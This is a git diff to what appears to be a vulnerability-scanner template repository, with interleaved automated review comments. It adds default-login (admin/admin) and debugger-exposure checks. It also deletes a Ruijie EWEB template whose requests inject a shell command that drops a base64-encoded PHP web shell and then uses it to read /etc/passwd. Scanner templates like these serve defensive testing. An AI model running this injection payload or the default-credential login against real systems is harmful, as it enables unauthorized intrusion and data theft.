diff --git a/.new-additions b/.new-additions
index 7378e38a41..a8484e671c 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,9 +1,11 @@
+default-logins/xnat-default-login.yaml
exposed-panels/allied-telesis-exposure.yaml
exposed-panels/cisco/cisco-anyconnect-vpn.yaml
exposed-panels/connectwise-backup-manager.yaml
exposed-panels/nginx-ui-dashboard.yaml
misconfiguration/debug/ampache-debug.yaml
misconfiguration/debug/github-debug.yaml
+misconfiguration/debug/werkzeug-debug.yaml
misconfiguration/healthchecks-ui-exposure.yaml
misconfiguration/installer/ampache-music-installer.yaml
misconfiguration/installer/moodle-installer.yaml
diff --git a/.nuclei-ignore b/.nuclei-ignore
index 14806f1dfa..2e8e2a8b54 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -27,6 +27,7 @@ files:
- cves/2007/CVE-2007-5728.yaml
- cves/2014/CVE-2014-9608.yaml
- cves/2018/CVE-2018-5233.yaml
+ - cves/2019/CVE-2019-14696.yaml
- cves/2020/CVE-2020-11930.yaml
- cves/2020/CVE-2020-19295.yaml
- cves/2020/CVE-2020-2036.yaml
diff --git a/cnvd/2021/CNVD-2021-09650.yaml b/cnvd/2021/CNVD-2021-09650.yaml
index 528666e80d..33ea61f263 100644
--- a/cnvd/2021/CNVD-2021-09650.yaml
+++ b/cnvd/2021/CNVD-2021-09650.yaml
@@ -1,12 +1,14 @@
id: CNVD-2021-09650
info:
- name: Ruijie EWEB Gateway Platform - Remote Command Injection
- author: daffainfo
+ name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
+ author: daffainfo,pikpikcu
severity: critical
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
reference:
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
+ - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
+ - https://www.ruijienetworks.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
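Review bot: The renamed `name` on the new side no longer agrees with the unchanged `description`, which still reads "Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks." Since this commit deletes vulnerabilities/ruijie/ruijie-networks-rce.yaml and carries its name and references over here, the description should use the same product name and impact, e.g. `description: Ruijie Networks EWEB Network Management System is susceptible to remote code execution via command injection.` The added `https://www.ruijienetworks.com` reference is a vendor home page rather than an advisory, so it gives little to someone triaging a finding. The `info` block continues past the end of this hunk, so the rest of the classification and the tags cannot be checked from here.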
diff --git a/cves/2019/CVE-2019-14696.yaml b/cves/2019/CVE-2019-14696.yaml
index 2eea2b4949..686ad935a3 100644
--- a/cves/2019/CVE-2019-14696.yaml
+++ b/cves/2019/CVE-2019-14696.yaml
@@ -1,7 +1,7 @@
id: CVE-2019-14696
info:
- name: Open-Scool 3.0/Community Edition 2.3 - Cross-Site Scripting
+ name: Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.
@@ -15,7 +15,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-14696
cwe-id: CWE-79
- tags: packetstorm,cve,cve2019,xss
+ tags: xss,open-school,packetstorm,cve,cve2019
requests:
- method: GET
@@ -24,12 +24,19 @@ requests:
matchers-condition: and
matchers:
+
+ - type: word
+ part: body
+ words:
+ - ''
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
- type: status
status:
- 200
- - type: word
- words:
- - ''
- part: body
# Enhanced by mp on 2022/08/08
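Review bot: As shown, the body word matcher that was moved to the top of `matchers` still holds an empty string (`- ''`), and an empty word is contained in every body, so the template would report any 200 response served as `text/html`. If the empty string is really in the file and not lost when the page was rendered, it should be the exact marker the request places in the `id` parameter, e.g. `- '<MARKER_SENT_IN_REQUEST_PATH>'`. The request path lies outside this hunk, so the reflected value cannot be confirmed from here. The template is also added to `.nuclei-ignore` in this same commit with no explanation; a comment next to that entry saying why it is excluded would help, and the added blank line directly under `matchers:` can be dropped.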
diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml
index 843f3e8cab..877245b4ae 100644
--- a/default-logins/activemq/activemq-default-login.yaml
+++ b/default-logins/activemq/activemq-default-login.yaml
@@ -3,7 +3,7 @@ id: activemq-default-login
info:
name: Apache ActiveMQ Default Login
author: pdteam
- severity: medium
+ severity: high
description: Apache ActiveMQ default login information was discovered.
reference:
- https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html
diff --git a/default-logins/xnat-default-login.yaml b/default-logins/xnat-default-login.yaml
new file mode 100644
index 0000000000..8c9a28b01e
--- /dev/null
+++ b/default-logins/xnat-default-login.yaml
@@ -0,0 +1,42 @@
+id: xnat-default-login
+
+info:
+ name: XNAT Default Login
+ author: 0x_Akoko
+ severity: high
+ description: XNAT default login information (admin/admin) was discovered.
+ reference:
+ - https://wiki.xnat.org/documentation/xnat-administration/xnat-setup-first-time-configuration#:~:text=Log%20in%20with%20the%20username%20admin%20and%20password%20admin
+ metadata:
+ verified: true
+ shodan-query: http.title:"XNAT"
+ tags: default-login,xnat
+
+requests:
+ - raw:
+ - |
+ POST /login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ login_method=localdb&username={{username}}&password={{password}}&login=&XNAT_CSRF=
+
+ attack: pitchfork
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "app/template/Index.vm?login=true"
+ - "JSESSIONID"
+ condition: and
+
+ - type: status
+ status:
+ - 302
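Review bot: The `JSESSIONID` word in the header matcher probably adds no discrimination, since a session cookie is typically set on failed logins as well, so the verdict rests on the `app/template/Index.vm?login=true` redirect plus the 302; it is worth confirming against a failed login that the Location value differs. The request body posts an empty `XNAT_CSRF=`, which instances enforcing the token may reject, giving a false negative; a comment above the raw request stating that the empty token is intentional would help. The `info` block has no `classification` or remediation text, and a line such as `remediation: Change the default admin password after first-time setup.` would make a finding actionable.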
diff --git a/misconfiguration/debug/werkzeug-debug.yaml b/misconfiguration/debug/werkzeug-debug.yaml
new file mode 100644
index 0000000000..5e8d5d99f6
--- /dev/null
+++ b/misconfiguration/debug/werkzeug-debug.yaml
@@ -0,0 +1,28 @@
+id: flask-werkzeug-debug
+
+info:
+ name: Flask Werkzeug Debugger Exposure
+ author: DhiyaneshDk
+ severity: low
+ metadata:
+ verified: true
+ shodan-query: title:"TypeError"
+ tags: werkzeug,exposure,debug
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'TypeError:'
+ - 'Werkzeug powered traceback interpreter'
+ condition: and
+
+ - type: status
+ status:
+ - 500
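Review bot: Requiring `'TypeError:'` together with `'Werkzeug powered traceback interpreter'` limits detection to targets whose root path happens to raise a TypeError, so a debugger page shown for any other exception is missed; the second string alone identifies the debugger, and the first word and `condition: and` could be dropped. The template id `flask-werkzeug-debug` does not match the file name `werkzeug-debug.yaml`, and the `info` block has no `description`; something like `description: The Werkzeug debugger is enabled and reachable, exposing tracebacks and application source.` would do. Because the debugger page also offers an interactive console, `severity: low` may be understated and is worth a second look.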
diff --git a/vulnerabilities/ruijie/ruijie-networks-rce.yaml b/vulnerabilities/ruijie/ruijie-networks-rce.yaml
deleted file mode 100644
index bf405a66f3..0000000000
--- a/vulnerabilities/ruijie/ruijie-networks-rce.yaml
+++ /dev/null
@@ -1,43 +0,0 @@
-id: ruijie-networks-rce
-
-info:
- name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
- author: pikpikcu
- description: Ruijie Networks EWEB Network Management System is susceptible to remote code execution.
- severity: critical
- reference:
- - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
- - https://www.ruijienetworks.com
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cwe-id: CWE-77
- tags: ruijie,rce,network
-
-requests:
- - raw:
- - |
- POST /guest_auth/guestIsUp.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded;charset=UTF-8
-
- ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00
-
- - |
- GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded;charset=UTF-8
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - "nobody:x:0:0:"
- part: body
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/06/03